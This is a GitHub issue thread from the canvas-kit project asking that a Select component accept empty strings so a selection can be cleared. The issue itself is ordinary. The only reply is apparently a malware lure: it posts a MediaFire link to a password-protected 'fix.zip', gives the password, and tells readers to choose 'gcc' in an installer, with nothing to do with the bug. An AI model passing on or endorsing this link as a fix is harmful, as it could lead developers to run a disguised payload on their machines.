### ISSUE TITLE
Select should allow empty strings as valid ids

### ISSUE THREAD

**Issue by mannycarrera4** [Workday/canvas-kit#2888]
## 🐛 Bug Report

There should be a way to clear a selection. An empty string used to be that way. When we added the server input, it now has to find an option to trigger the onChange event. I think an empty string should be a valid value. I believe a native select clears when sent an empty string.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
